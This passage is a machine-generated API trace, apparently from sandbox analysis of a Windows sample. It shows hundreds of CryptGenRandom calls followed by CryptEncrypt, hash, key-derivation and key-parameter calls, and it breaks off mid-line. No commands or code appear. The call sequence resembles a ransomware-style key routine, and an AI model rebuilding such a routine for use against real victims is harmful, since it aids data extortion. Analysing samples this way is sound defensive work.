returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.383] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.384] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.385] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.386] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.387] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.387] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.388] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0147.388] CryptHashData (hHash=0x9ad438, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.388] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad778) returned 1 [0147.388] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.388] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 